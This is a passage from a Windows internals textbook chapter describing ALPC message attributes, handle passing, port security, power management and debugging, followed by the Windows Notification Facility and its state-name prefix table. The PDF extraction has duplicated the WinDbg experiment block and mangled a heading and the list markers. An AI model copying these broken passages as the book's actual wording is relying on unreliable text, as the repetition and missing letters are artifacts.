217
I
The direct attribute, which is used when sending direct messages that have a synchronization
object associated with them (described later in the “Direct event” section).
I
The work-on-behalf-of attribute, which is used to encode a work ticket used for better power
management and resource management decisions (see the “Power management” section later).
Some of these attributes are initially passed in by the server or client when the message is sent and
converted into the kernel’s own internal ALPC representation. If the ALPC user requests this data back,
it is exposed back securely. In a few cases, a server or client can always request an attribute, because it
is ALPC that internally associates it with a message and always makes it available (such as the context
or token attributes). By implementing this kind of model and combining it with its own internal handle
table, described next, ALPC can keep critical data opaque between clients and servers while still main-
taining the true pointers in kernel mode.
To define attributes correctly, a variety of APIs are available for internal ALPC consumers, such as
AlpcInitializeMessageAttribute and AlpcGetMessageAttribute.
Blobs, handles, and resources
Although the ALPC subsystem exposes only one Object Manager object type (the port), it internally
must manage a number of data structures that allow it to perform the tasks required by its mecha-
nisms. For example, ALPC needs to allocate and track the messages associated with each port, as well
as the message attributes, which it must track for the duration of their lifetime. Instead of using the
Object Manager’s routines for data management, ALPC implements its own lightweight objects called
blobs. Just like objects, blobs can automatically be allocated and garbage collected, reference tracked,
and locked through synchronization. Additionally, blobs can have custom allocation and deallocation
callbacks, which let their owners control extra information that might need to be tracked for each blob.
Finally, ALPC also uses the executive’s handle table implementation (used for objects and PIDs/TIDs) to
have an ALPC-specific handle table, which allows ALPC to generate private handles for blobs, instead of
using pointers.
In the ALPC model, messages are blobs, for example, and their constructor generates a message ID,
which is itself a handle into ALPC’s handle table. Other ALPC blobs include the following:
I
The connection blob, which stores the client and server communication ports, as well as the
server connection port and ALPC handle table.
I
The security blob, which stores the security data necessary to allow impersonation of a client.
It stores the security attribute.
I
The section, region, and view blobs, which describe ALPC’s shared-memory model. The view
blob is ultimately responsible for storing the data view attribute.
I
The reserve blob, which implements support for ALPC Reserve Objects. (See the “Reserve
objects” section earlier in this chapter.)
I
The handle data blob, which contains the information that enables ALPC’s handle attribute support.
218
CHAPTER 8 System mechanisms
Because blobs are allocated from pageable memory, they must carefully be tracked to ensure their
deletion at the appropriate time. For certain kinds of blobs, this is easy: for example, when an ALPC
message is freed, the blob used to contain it is also deleted. However, certain blobs can represent
numerous attributes attached to a single ALPC message, and the kernel must manage their lifetime
appropriately. For example, because a message can have multiple views associated with it (when many
clients have access to the same shared memory), the views must be tracked with the messages that
reference them. ALPC implements this functionality by using a concept of resources. Each message
is associated with a resource list, and whenever a blob associated with a message (that isn’t a simple
pointer) is allocated, it is also added as a resource of the message. In turn, the ALPC library provides
functionality for looking up, flushing, and deleting associated resources. Security blobs, reserve blobs,
and view blobs are all stored as resources.
Handle passing
A key feature of Unix Domain Sockets and Mach ports, which are the most complex and most used
IPC mechanisms on Linux and macOS, respectively, is the ability to send a message that encodes a file
descriptor which will then be duplicated in the receiving process, granting it access to a UNIX-style file
(such as a pipe, socket, or actual file system location). With ALPC, Windows can now also benefit from
this model, with the handle attribute exposed by ALPC. This attribute allows a sender to encode an
object type, some information about how to duplicate the handle, and the handle index in the table of
the sender. If the handle index matches the type of object the sender is claiming to send, a duplicated
handle is created, for the moment, in the system (kernel) handle table. This first part guarantees that
the sender truly is sending what it is claiming, and that at this point, any operation the sender might
undertake does not invalidate the handle or the object beneath it.
Next, the receiver requests exposing the handle attribute, specifying the type of object they expect.
If there is a match, the kernel handle is duplicated once more, this time as a user-mode handle in the
table of the receiver (and the kernel copy is now closed). The handle passing has been completed, and
the receiver is guaranteed to have a handle to the exact same object the sender was referencing and of
the type the receiver expects. Furthermore, because the duplication is done by the kernel, it means a
privileged server can send a message to an unprivileged client without requiring the latter to have any
type of access to the sending process.
This handle-passing mechanism, when first implemented, was primarily used by the Windows
subsystem (CSRSS), which needs to be made aware of any child processes created by existing Windows
processes, so that they can successfully connect to CSRSS when it is their turn to execute, with CSRSS
already knowing about their creation from the parent. It had several issues, however, such as the inabil-
ity to send more than a single handle (and certainly not more than one type of object). It also forced
receivers to always receive any handle associated with a message on the port without knowing ahead
of time if the message should have a handle associated with it to begin with.
To rectify these issues, Windows 8 and later now implement the indirect handle passing mechanism,
which allows sending multiple handles of different types and allows receivers to manually retrieve han-
dles on a per-message basis. If a port accepts and enables such indirect handles (non-RPC-based ALPC
servers typically do not use indirect handles), handles will no longer be automatically duplicated based
CHAPTER 8 System mechanisms
219
on the handle attribute passed in when receiving a new message with NtAlpcSendWaitReceivePort—
instead, ALPC clients and servers will have to manually query how many handles a given message con-
tains, allocate sufficient data structures to receive the handle values and their types, and then request
the duplication of all the handles, parsing the ones that match the expected types (while closing/drop-
ping unexpected ones) by using NtAlpcQueryInformationMessage and passing in the received message.
This new behavior also introduces a security benefit—instead of handles being automatically dupli-
cated as soon as the caller specifies a handle attribute with a matching type, they are only duplicated
when requested on a per-message basis. Because a server might expect a handle for message A, but
not necessarily for all other messages, nonindirect handles can be problematic if the server doesn’t
think of closing any possible handle even while parsing message B or C. With indirect handles, the
server would never call NtAlpcQueryInformationMessage for such messages, and the handles would
never be duplicated (or necessitate closing them).
Due to these improvements, the ALPC handle-passing mechanism is now exposed beyond just the
limited use-cases described and is integrated with the RPC runtime and IDL compiler. It is now possible
to use the system_handle(sh_type) syntax to indicate more than 20 different handle types that the RPC
runtime can marshal from a client to a server (or vice-versa). Furthermore, although ALPC provides
the type checking from the kernel’s perspective, as described earlier, the RPC runtime itself also does
additional type checking—for example, while both named pipes, sockets, and actual files are all “File
Objects” (and thus handles of type “File”), the RPC runtime can do marshalling and unmarshalling
checks to specifically detect whether a Socket handle is being passed when the IDL file indicates sys-
tem_handle(sh_pipe), for example (this is done by calling APIs such as GetFileAttribute, GetDeviceType,
and so on).
This new capability is heavily leveraged by the AppContainer infrastructure and is the key way
through which the WinRT API transfers handles that are opened by the various brokers (after do-
ing capability checks) and duplicated back into the sandboxed application for direct use. Other
RPC services that leverage this functionality include the DNS Client, which uses it to populate the
ai_resolutionhandle field in the GetAddrInfoEx API.
Security
ALPC implements several security mechanisms, full security boundaries, and mitigations to prevent at-
tacks in case of generic IPC parsing bugs. At a base level, ALPC port objects are managed by the same
Object Manager interfaces that manage object security, preventing nonprivileged applications from
obtaining handles to server ports with ACL. On top of that, ALPC provides a SID-based trust model,
inherited from the original LPC design. This model enables clients to validate the server they are con-
necting to by relying on more than just the port name. With a secured port, the client process submits
to the kernel the SID of the server process it expects on the side of the endpoint. At connection time,
the kernel validates that the client is indeed connecting to the expected server, mitigating namespace
squatting attacks where an untrusted server creates a port to spoof a server.
ALPC also allows both clients and servers to atomically and uniquely identify the thread and process
responsible for each message. It also supports the full Windows impersonation model through the
220
CHAPTER 8 System mechanisms
NtAlpcImpersonateClientThread API. Other APIs give an ALPC server the ability to query the SIDs asso-
ciated with all connected clients and to query the LUID (locally unique identifier) of the client’s security
token (which is further described in Chapter 7 of Part 1).
ALPC port ownership
The concept of port ownership is important to ALPC because it provides a variety of security guaran-
tees to interested clients and servers. First and foremost, only the owner of an ALPC connection port
can accept connections on the port. This ensures that if a port handle were to be somehow duplicated
or inherited into another process, it would not be able to illegitimately accept incoming connections.
Additionally, when handle attributes are used (direct or indirect), they are always duplicated in the con-
text of the port owner process, regardless of who may be currently parsing the message.
These checks are highly relevant when a kernel component might be communicating with a client
using ALPC—the kernel component may currently be attached to a completely different process (or
even be operating as part of the System process with a system thread consuming the ALPC port mes-
sages), and knowledge of the port owner means ALPC does not incorrectly rely on the current process.
Conversely, however, it may be beneficial for a kernel component to arbitrarily accept incoming
connections on a port regardless of the current process. One poignant example of this issue is when an
executive callback object is used for message delivery. In this scenario, because the callback is synchro-
nously called in the context of one or more sender processes, whereas the kernel connection port was
likely created while executing in the System context (such as in DriverEntry), there would be a mismatch
between the current process and the port owner process during the acceptance of the connection.
ALPC provides a special port attribute flag—which only kernel callers can use—that marks a connec-
tion port as a system port; in such a case, the port owner checks are ignored.
Another important use case of port ownership is when performing server SID validation checks if
a client has requested it, as was described in the “Security” section. This validation is always done by
checking against the token of the owner of the connection port, regardless of who may be listening for
messages on the port at this time.
Performance
ALPC uses several strategies to enhance performance, primarily through its support of completion lists,
which were briefly described earlier. At the kernel level, a completion list is essentially a user Memory
Descriptor List (MDL) that’s been probed and locked and then mapped to an address. (For more informa-
tion on MDLs, see Chapter 5 in Part 1.) Because it’s associated with an MDL (which tracks physical pages),
when a client sends a message to a server, the payload copy can happen directly at the physical level
instead of requiring the kernel to double-buffer the message, as is common in other IPC mechanisms.
The completion list itself is implemented as a 64-bit queue of completed entries, and both user-
mode and kernel-mode consumers can use an interlocked compare-exchange operation to insert and
remove entries from the queue. Furthermore, to simplify allocations, once an MDL has been initialized,
a bitmap is used to identify available areas of memory that can be used to hold new messages that are
still being queued. The bitmap algorithm also uses native lock instructions on the processor to provide
CHAPTER 8 System mechanisms
221
atomic allocation and deallocation of areas of physical memory that can be used by completion lists.
Completion lists can be set up with NtAlpcSetInformationPort.
A final optimization worth mentioning is that instead of copying data as soon as it is sent, the kernel
sets up the payload for a delayed copy, capturing only the needed information, but without any copy-
ing. The message data is copied only when the receiver requests the message. Obviously, if shared
memory is being used, there’s no advantage to this method, but in asynchronous, kernel-buffer mes-
sage passing, this can be used to optimize cancellations and high-traffic scenarios.
Power management
As we’ve seen previously, when used in constrained power environments, such as mobile platforms,
Windows uses a number of techniques to better manage power consumption and processor availabil-
ity, such as by doing heterogenous processing on architectures that support it (such as ARM64’s big.
LITTLE) and by implementing Connected Standby as a way to further reduce power on user systems
when under light use.
To play nice with these mechanisms, ALPC implements two additional features: the ability for ALPC
clients to push wake references onto their ALPC server’s wake channel and the introduction of the Work
On Behalf Of Attribute. The latter is an attribute that a sender can choose to associate with a message
when it wants to associate the request with the current work ticket that it is associated with, or to create
a new work ticket that describes the sending thread.
Such work tickets are used, for example, when the sender is currently part of a Job Object (either
due to being in a Silo/Windows Container or by being part of a heterogenous scheduling system and/
or Connected Standby system) and their association with a thread will cause various parts of the system
to attribute CPU cycles, I/O request packets, disk/network bandwidth attribution, and energy estima-
tion to be associated to the “behalf of” thread and not the acting thread.
Additionally, foreground priority donation and other scheduling steps are taken to avoid big.LITTLE
priority inversion issues, where an RPC thread is stuck on the small core simply by virtue of being a
background service. With a work ticket, the thread is forcibly scheduled on the big core and receives a
foreground boost as a donation.
Finally, wake references are used to avoid deadlock situations when the system enters a connected
standby (also called Modern Standby) state, as was described in Chapter 6 of Part 1, or when a UWP
application is targeted for suspension. These references allow the lifetime of the process owning the
ALPC port to be pinned, preventing the force suspend/deep freeze operations that the Process Lifetime
Manager (PLM) would attempt (or the Power Manager, even for Win32 applications). Once the mes-
sage has been delivered and processed, the wake reference can be dropped, allowing the process to
be suspended if needed. (Recall that termination is not a problem because sending a message to a
terminated process/closed port immediately wakes up the sender with a special PORT_CLOSED reply,
instead of blocking on a response that will never come.)
222
CHAPTER 8 System mechanisms
ALPC direct event attribute
Recall that ALPC provides two mechanisms for clients and servers to communicate: requests, which are
bidirectional, requiring a response, and datagrams, which are unidirectional and can never be synchro-
nously replied to. A middle ground would be beneficial—a datagram-type message that cannot be
replied to but whose receipt could be acknowledged in such a way that the sending party would know
that the message was acted upon, without the complexity of having to implement response process-
ing. In fact, this is what the direct event attribute provides.
By allowing a sender to associate a handle to a kernel event object (through CreateEvent) with the
ALPC message, the direct event attribute captures the underlying KEVENT and adds a reference to it,
tacking it onto the KALPC_MESSAGE structure. Then, when the receiving process gets the message,
it can expose this direct event attribute and cause it to be signaled. A client could either have a Wait
Completion Packet associated with an I/O completion port, or it could be in a synchronous wait call
such as with WaitForSingleObject on the event handle and would now receive a notification and/or wait
satisfaction, informing it of the message’s successful delivery.
This functionality was previously manually provided by the RPC runtime, which allows clients call-
ing RpcAsyncInitializeHandle to pass in RpcNotificationTypeEvent and associate a HANDLE to an event
object with an asynchronous RPC message. Instead of forcing the RPC runtime on the other side to
respond to a request message, such that the RPC runtime on the sender’s side would then signal the
event locally to signal completion, ALPC now captures it into a Direct Event attribute, and the message
is placed on a Direct Message Queue instead of the regular Message Queue. The ALPC subsystem will
signal the message upon delivery, efficiently in kernel mode, avoiding an extra hop and context-switch.
Debugging and tracing
On checked builds of the kernel, ALPC messages can be logged. All ALPC attributes, blobs, message
zones, and dispatch transactions can be individually logged, and undocumented !alpc commands
in WinDbg can dump the logs. On retail systems, IT administrators and troubleshooters can enable
the ALPC events of the NT kernel logger to monitor ALPC messages, (Event Tracing for Windows, also
known as ETW, is discussed in Chapter 10.) ETW events do not include payload data, but they do con-
tain connection, disconnection, and send/receive and wait/unblock information. Finally, even on retail
systems, certain !alpc commands obtain information on ALPC ports and messages.
CHAPTER 8 System mechanisms
223
EXPERIMENT: Dumping a connection port
In this experiment, you use the CSRSS API port for Windows processes running in Session 1, which
is the typical interactive session for the console user. Whenever a Windows application launches,
it connects to CSRSS’s API port in the appropriate session.
1.
Start by obtaining a pointer to the connection port with the !object command:
lkd> !object \Sessions\1\Windows\ApiPort
Object: ffff898f172b2df0 Type: (ffff898f032f9da0) ALPC Port
ObjectHeader: ffff898f172b2dc0 (new version)
HandleCount: 1 PointerCount: 7898
Directory Object: ffffc704b10d9ce0 Name: ApiPort
2.
Dump information on the port object itself with !alpc /p. This will confirm, for example,
that CSRSS is the owner:
lkd> !alpc /P ffff898f172b2df0
Port ffff898f172b2df0
Type
: ALPC_CONNECTION_PORT
CommunicationInfo
: ffffc704adf5d410
ConnectionPort
: ffff898f172b2df0 (ApiPort), Connections
ClientCommunicationPort : 0000000000000000
ServerCommunicationPort : 0000000000000000
OwnerProcess
: ffff898f17481140 (csrss.exe), Connections
SequenceNo
: 0x0023BE45 (2342469)
CompletionPort
: 0000000000000000
CompletionList
: 0000000000000000
ConnectionPending
: No
ConnectionRefused
: No
Disconnected
: No
Closed
: No
FlushOnClose
: Yes
ReturnExtendedInfo
: No
Waitable
: No
Security
: Static
Wow64CompletionList
: No
5 thread(s) are waiting on the port:
THREAD ffff898f3353b080 Cid 0288.2538 Teb: 00000090bce88000
Win32Thread: ffff898f340cde60 WAIT
THREAD ffff898f313aa080 Cid 0288.19ac Teb: 00000090bcf0e000
Win32Thread: ffff898f35584e40 WAIT
THREAD ffff898f191c3080 Cid 0288.060c Teb: 00000090bcff1000
Win32Thread: ffff898f17c5f570 WAIT
THREAD ffff898f174130c0 Cid 0288.0298 Teb: 00000090bcfd7000
Win32Thread: ffff898f173f6ef0 WAIT
THREAD ffff898f1b5e2080 Cid 0288.0590 Teb: 00000090bcfe9000
Win32Thread: ffff898f173f82a0 WAIT
THREAD ffff898f3353b080 Cid 0288.2538 Teb: 00000090bce88000
Win32Thread: ffff898f340cde60 WAIT
EXPERIMENT: Dumping a connection port
In this experiment, you use the CSRSS API port for Windows processes running in Session 1, which
is the typical interactive session for the console user. Whenever a Windows application launches,
it connects to CSRSS’s API port in the appropriate session.
1.
Start by obtaining a pointer to the connection port with the !object command:
lkd> !object \Sessions\1\Windows\ApiPort
Object: ffff898f172b2df0 Type: (ffff898f032f9da0) ALPC Port
ObjectHeader: ffff898f172b2dc0 (new version)
HandleCount: 1 PointerCount: 7898
Directory Object: ffffc704b10d9ce0 Name: ApiPort
2.
Dump information on the port object itself with !alpc /p. This will confirm, for example,
that CSRSS is the owner:
lkd> !alpc /P ffff898f172b2df0
Port ffff898f172b2df0
Type
: ALPC_CONNECTION_PORT
CommunicationInfo
: ffffc704adf5d410
ConnectionPort
: ffff898f172b2df0 (ApiPort), Connections
ClientCommunicationPort : 0000000000000000
ServerCommunicationPort : 0000000000000000
OwnerProcess
: ffff898f17481140 (csrss.exe), Connections
SequenceNo
: 0x0023BE45 (2342469)
CompletionPort
: 0000000000000000
CompletionList
: 0000000000000000
ConnectionPending
: No
ConnectionRefused
: No
Disconnected
: No
Closed
: No
FlushOnClose
: Yes
ReturnExtendedInfo
: No
Waitable
: No
Security
: Static
Wow64CompletionList
: No
5 thread(s) are waiting on the port:
THREAD ffff898f3353b080 Cid 0288.2538 Teb: 00000090bce88000
Win32Thread: ffff898f340cde60 WAIT
THREAD ffff898f313aa080 Cid 0288.19ac Teb: 00000090bcf0e000
Win32Thread: ffff898f35584e40 WAIT
THREAD ffff898f191c3080 Cid 0288.060c Teb: 00000090bcff1000
Win32Thread: ffff898f17c5f570 WAIT
THREAD ffff898f174130c0 Cid 0288.0298 Teb: 00000090bcfd7000
Win32Thread: ffff898f173f6ef0 WAIT
THREAD ffff898f1b5e2080 Cid 0288.0590 Teb: 00000090bcfe9000
Win32Thread: ffff898f173f82a0 WAIT
THREAD ffff898f3353b080 Cid 0288.2538 Teb: 00000090bce88000
Win32Thread: ffff898f340cde60 WAIT
224
CHAPTER 8 System mechanisms
Main queue is empty.
Direct message queue is empty.
Large message queue is empty.
Pending queue is empty.
Canceled queue is empty.
3.
You can see what clients are connected to the port, which includes all Windows pro-
cesses running in the session, with the undocumented !alpc /lpc command, or, with a
newer version of WinDbg, you can simply click the Connections link next to the ApiPort
name. You will also see the server and client communication ports associated with each
connection and any pending messages on any of the queues:
lkd> !alpc /lpc ffff898f082cbdf0
ffff898f082cbdf0('ApiPort') 0, 131 connections
ffff898f0b971940 0 ->ffff898F0868a680 0 ffff898f17479080('wininit.exe')
ffff898f1741fdd0 0 ->ffff898f1742add0 0 ffff898f174ec240('services.exe')
ffff898f1740cdd0 0 ->ffff898f17417dd0 0 ffff898f174da200('lsass.exe')
ffff898f08272900 0 ->ffff898f08272dc0 0 ffff898f1753b400('svchost.exe')
ffff898f08a702d0 0 ->ffff898f084d5980 0 ffff898f1753e3c0('svchost.exe')
ffff898f081a3dc0 0 ->ffff898f08a70070 0 ffff898f175402c0('fontdrvhost.ex')
ffff898F086dcde0 0 ->ffff898f17502de0 0 ffff898f17588440('svchost.exe')
ffff898f1757abe0 0 ->ffff898f1757b980 0 ffff898f17c1a400('svchost.exe')
4.
Note that if you have other sessions, you can repeat this experiment on those sessions
also (as well as with session 0, the system session). You will eventually get a list of all the
Windows processes on your machine.
indows otification acilit
The Windows Notification Facility, or WNF, is the core underpinning of a modern registrationless pub-
lisher/subscriber mechanism that was added in Windows 8 as a response to a number of architectural
deficiencies when it came to notifying interested parties about the existence of some action, event, or
state, and supplying a data payload associated with this state change.
To illustrate this, consider the following scenario: Service A wants to notify potential clients B, C, and
D that the disk has been scanned and is safe for write access, as well as the number of bad sectors (if
any) that were detected during the scan. There is no guarantee that B, C, D start after A—in fact, there’s
a good chance they might start earlier. In this case, it is unsafe for them to continue their execution, and
they should wait for A to execute and report the disk is safe for write access. But if A isn’t even running
yet, how does one wait for it in the first place?
Main queue is empty.
Direct message queue is empty.
Large message queue is empty.
Pending queue is empty.
Canceled queue is empty.
3.
You can see what clients are connected to the port, which includes all Windows pro-
cesses running in the session, with the undocumented !alpc /lpc command, or, with a
newer version of WinDbg, you can simply click the Connections link next to the ApiPort
name. You will also see the server and client communication ports associated with each
connection and any pending messages on any of the queues:
lkd> !alpc /lpc ffff898f082cbdf0
ffff898f082cbdf0('ApiPort') 0, 131 connections
ffff898f0b971940 0 ->ffff898F0868a680 0 ffff898f17479080('wininit.exe')
ffff898f1741fdd0 0 ->ffff898f1742add0 0 ffff898f174ec240('services.exe')
ffff898f1740cdd0 0 ->ffff898f17417dd0 0 ffff898f174da200('lsass.exe')
ffff898f08272900 0 ->ffff898f08272dc0 0 ffff898f1753b400('svchost.exe')
ffff898f08a702d0 0 ->ffff898f084d5980 0 ffff898f1753e3c0('svchost.exe')
ffff898f081a3dc0 0 ->ffff898f08a70070 0 ffff898f175402c0('fontdrvhost.ex')
ffff898F086dcde0 0 ->ffff898f17502de0 0 ffff898f17588440('svchost.exe')
ffff898f1757abe0 0 ->ffff898f1757b980 0 ffff898f17c1a400('svchost.exe')
4.
Note that if you have other sessions, you can repeat this experiment on those sessions
also (as well as with session 0, the system session). You will eventually get a list of all the
Windows processes on your machine.
CHAPTER 8 System mechanisms
225
A typical solution would be for B to create an event “CAN_I_WAIT_FOR_A_YET” and then have A look
for this event once started, create the “A_SAYS_DISK_IS_SAFE” event and then signal “CAN_I_WAIT_
FOR_A_YET,” allowing B to know it’s now safe to wait for “A_SAYS_DISK_IS_SAFE”. In a single client sce-
nario, this is feasible, but things become even more complex once we think about C and D, which might
all be going through this same logic and could race the creation of the “CAN_I_WAIT_FOR_A_YET” event,
at which point they would open the existing event (in our example, created by B) and wait on it to be
signaled. Although this can be done, what guarantees that this event is truly created by B? Issues around
malicious “squatting” of the name and denial of service attacks around the name now arise. Ultimately, a
safe protocol can be designed, but this requires a lot of complexity for the developer(s) of A, B, C, and D—
and we haven’t even discussed how to get the number of bad sectors.
WNF features
The scenario described in the preceding section is a common one in operating system design—and the
correct pattern for solving it clearly shouldn’t be left to individual developers. Part of a job of an operat-
ing system is to provide simple, scalable, and performant solutions to common architectural challenges
such as these, and this is what WNF aims to provide on modern Windows platforms, by providing:
I
The ability to define a state name that can be subscribed to, or published to by arbitrary pro-
cesses, secured by a standard Windows security descriptor (with a DACL and SACL)
I
The ability to associate such a state name with a payload of up to 4 KB, which can be retrieved
along with the subscription to a change in the state (and published with the change)
I
The ability to have well-known state names that are provisioned with the operating system and
do not need to be created by a publisher while potentially racing with consumers—thus con-
sumers will block on the state change notification even if a publisher hasn’t started yet
I
The ability to persist state data even between reboots, such that consumers may be able to see
previously published data, even if they were not yet running
I
The ability to assign state change timestamps to each state name, such that consumers can
know, even across reboots, if new data was published at some point without the consumer be-
ing active (and whether to bother acting on previously published data)
I
The ability to assign scope to a given state name, such that multiple instances of the same state
name can exist either within an interactive session ID, a server silo (container), a given user
token/SID, or even within an individual process.
I
Finally, the ability to do all of the publishing and consuming of WNF state names while crossing
the kernel/user boundary, such that components can interact with each other on either side.
226
CHAPTER 8 System mechanisms
WNF users
As the reader can tell, providing all these semantics allows for a rich set of services and kernel compo-
nents to leverage WNF to provide notifications and other state change signals to hundreds of clients
(which could be as fine-grained as individual APIs in various system libraries to large scale processes). In
fact, several key system components and infrastructure now use WNF, such as
I
The Power Manager and various related components use WNF to signal actions such as clos-
ing and opening the lid, battery charging state, turning the monitor off and on, user presence
detection, and more.
I
The Shell and its components use WNF to track application launches, user activity, lock screen
behavior, taskbar behavior, Cortana usage, and Start menu behavior.
I
The System Events Broker (SEB) is an entire infrastructure that is leveraged by UWP applications
and brokers to receive notifications about system events such as the audio input and output.
I
The Process Manager uses per-process temporary WNF state names to implement the wake
channel that is used by the Process Lifetime Manager (PLM) to implement part of the mechanism
that allows certain events to force-wake processes that are marked for suspension (deep freeze).
Enumerating all users of WNF would take up this entire book because more than 6000 different
well-known state names are used, in addition to the various temporary names that are created (such as
the per-process wake channels). However, a later experiment showcases the use of the wnfdump utility
part of the book tools, which allows the reader to enumerate and interact with all of their system’s WNF
events and their data. The Windows Debugging Tools also provide a !wnf extension that is shown in a
future experiment and can also be used for this purpose. Meanwhile, the Table 8-31 explains some of
the key WNF state name prefixes and their uses. You will encounter many Windows components and
codenames across a vast variety of Windows SKUs, from Windows Phone to XBOX, exposing the rich-
ness of the WNF mechanism and its pervasiveness.
TABLE 8-31 WNF state name prefixes
Prefi
# of Names
Usage
9P
2
Plan 9 Redirector
A2A
1
App-to-App
AAD
2
Azure Active Directory
AA
3
Assigned Access
ACC
1
Accessibility
ACHK
1
Boot Disk Integrity Check (Autochk)
ACT
1
Activity
AFD
1
Ancillary Function Driver (Winsock)
AI
9
Application Install
AOW
1
Android-on-Windows (Deprecated)
ATP
1
Microsoft Defender ATP
CHAPTER 8 System mechanisms
227
Prefi
# of Names
Usage
AUDC
15
Audio Capture
AVA
1
Voice Activation
AVLC
3
Volume Limit Change
BCST
1
App Broadcast Service
BI
16
Broker Infrastructure
BLTH
14
Bluetooth
BMP
2
Background Media Player
BOOT
3
Boot Loader
BRI
1
Brightness
BSC
1
Browser Configuration (Legacy IE, Deprecated)
CAM
66
Capability Access Manager
CAPS
1
Central Access Policies
CCTL
1
Call Control Broker
CDP
17
Connected Devices Platform (Project “Rome”/Application Handoff)
CELL
78
Cellular Services
CERT
2
Certificate Cache
CFCL
3
Flight Configuration Client Changes
CI
4
Code Integrity
CLIP
6
Clipboard
CMFC
1
Configuration Management Feature Configuration
CMPT
1
Compatibility
CNET
10
Cellular Networking (Data)
CONT
1
Containers
CSC
1
Client Side Caching
CSHL
1
Composable Shell
CSH
1
Custom Shell Host
CXH
6
Cloud Experience Host
DBA
1
Device Broker Access
DCSP
1
Diagnostic Log CSP
DEP
2
Deployment (Windows Setup)
DEVM
3
Device Management
DICT
1
Dictionary
DISK
1
Disk
DISP
2
Display
DMF
4
Data Migration Framework
228
CHAPTER 8 System mechanisms
Prefi
# of Names
Usage
DNS
1
DNS
DO
2
Delivery Optimization
DSM
2
Device State Manager
DUMP
2
Crash Dump
DUSM
2
Data Usage Subscription Management
DWM
9
Desktop Window Manager
DXGK
2
DirectX Kernel
DX
24
DirectX
EAP
1
Extensible Authentication Protocol
EDGE
4
Edge Browser
EDP
15
Enterprise Data Protection
EDU
1
Education
EFS
2
Encrypted File Service
EMS
1
Emergency Management Services
ENTR
86
Enterprise Group Policies
EOA
8
Ease of Access
ETW
1
Event Tracing for Windows
EXEC
6
Execution Components (Thermal Monitoring)
FCON
1
Feature Configuration
FDBK
1
Feedback
FLTN
1
Flighting Notifications
FLT
2
Filter Manager
FLYT
1
Flight ID
FOD
1
Features on Demand
FSRL
2
File System Runtime (FsRtl)
FVE
15
Full Volume Encryption
GC
9
Game Core
GIP
1
Graphics
GLOB
3
Globalization
GPOL
2
Group Policy
HAM
1
Host Activity Manager
HAS
1
Host Attestation Service
HOLO
32
Holographic Services
HPM
1
Human Presence Manager
HVL
1
Hypervisor Library (Hvl)
CHAPTER 8 System mechanisms
229
Prefi
# of Names
Usage
HYPV
2
Hyper-V
IME
4
Input Method Editor
IMSN
7
Immersive Shell Notifications
IMS
1
Entitlements
INPUT
5
Input
IOT
2
Internet of Things
ISM
4
Input State Manager
IUIS
1
Immersive UI Scale
KSR
2
Kernel Soft Reboot
KSV
5
Kernel Streaming
LANG
2
Language Features
LED
1
LED Alert
LFS
12
Location Framework Service
LIC
9
Licensing
LM
7
License Manager
LOC
3
Geolocation
LOGN
8
Logon
MAPS
3
Maps
MBAE
1
MBAE
MM
3
Memory Manager
MON
1
Monitor Devices
MRT
5
Microsoft Resource Manager
MSA
7
Microsoft Account
MSHL
1
Minimal Shell
MUR
2
Media UI Request
MU
1
Unknown
NASV
5
Natural Authentication Service
NCB
1
Network Connection Broker
NDIS
2
Kernel NDIS
NFC
1
Near Field Communication (NFC) Services
NGC
12
Next Generation Crypto
NLA
2
Network Location Awareness
NLM
6
Network Location Manager
NLS
4
Nationalization Language Services
230
CHAPTER 8 System mechanisms
Prefi
# of Names
Usage
NPSM
1
Now Playing Session Manager
NSI
1
Network Store Interface Service
OLIC
4
OS Licensing
OOBE
4
Out-Of-Box-Experience
OSWN
8
OS Storage
OS
2
Base OS
OVRD
1
Window Override
PAY
1
Payment Broker
PDM
2
Print Device Manager
PFG
2
Pen First Gesture
PHNL
1
Phone Line
PHNP
3
Phone Private
PHN
2
Phone
PMEM
1
Persistent Memory
PNPA-D
13
Plug-and-Play Manager
PO
54
Power Manager
PROV
6
Runtime Provisioning
PS
1
Kernel Process Manager
PTI
1
Push to Install Service
RDR
1
Kernel SMB Redirector
RM
3
Game Mode Resource Manager
RPCF
1
RPC Firewall Manager
RTDS
2
Runtime Trigger Data Store
RTSC
2
Recommended Troubleshooting Client
SBS
1
Secure Boot State
SCH
3
Secure Channel (SChannel)
SCM
1
Service Control Manager
SDO
1
Simple Device Orientation Change
SEB
61
System Events Broker
SFA
1
Secondary Factor Authentication
SHEL
138
Shell
SHR
3
Internet Connection Sharing (ICS)
SIDX
1
Search Indexer
SIO
2
Sign-In Options
CHAPTER 8 System mechanisms
231
Prefi
# of Names
Usage
SYKD
2
SkyDrive (Microsoft OneDrive)
SMSR
3
SMS Router
SMSS
1
Session Manager
SMS
1
SMS Messages
SPAC
2
Storage Spaces
SPCH
4
Speech
SPI
1
System Parameter Information
SPLT
4
Servicing
SRC
1
System Radio Change
SRP
1
System Replication
SRT
1
System Restore (Windows Recovery Environment)
SRUM
1
Sleep Study
SRV
2
Server Message Block (SMB/CIFS)
STOR
3
Storage
SUPP
1
Support
SYNC
1
Phone Synchronization
SYS
1
System
TB
1
Time Broker
TEAM
4
TeamOS Platform
TEL
5
Microsoft Defender ATP Telemetry
TETH
2
Tethering
THME
1
Themes
TKBN
24
Touch Keyboard Broker
TKBR
3
Token Broker
TMCN
1
Tablet Mode Control Notification
TOPE
1
Touch Event
TPM
9
Trusted Platform Module (TPM)
TZ
6
Time Zone
UBPM
4
User Mode Power Manager
UDA
1
User Data Access
UDM
1
User Device Manager
UMDF
2
User Mode Driver Framework
UMGR
9
User Manager
USB
8
Universal Serial Bus (USB) Stack
232
CHAPTER 8 System mechanisms
Prefi
# of Names
Usage
USO
16
Update Orchestrator
UTS
2
User Trusted Signals
UUS
1
Unknown
UWF
4
Unified Write Filter
VAN
1
Virtual Area Networks
VPN
1
Virtual Private Networks
VTSV
2
Vault Service
WAAS
2
Windows-as-a-Service
WBIO
1
Windows Biometrics
WCDS
1
Wireless LAN
WCM
6
Windows Connection Manager
WDAG
2
Windows Defender Application Guard
WDSC
1
Windows Defender Security Settings
WEBA
2
Web Authentication
WER
3
Windows Error Reporting
WFAS
1
Windows Firewall Application Service
WFDN
3
WiFi Display Connect (MiraCast)
WFS
5
Windows Family Safety
WHTP
2
Windows HTTP Library
WIFI
15
Windows Wireless Network (WiFi) Stack
WIL
20
Windows Instrumentation Library
WNS
1
Windows Notification Service
WOF
1
Windows Overlay Filter
WOSC
9
Windows One Setting Configuration
WPN
5
Windows Push Notifications
WSC
1
Windows Security Center
WSL
1
Windows Subsystem for Linux
WSQM
1
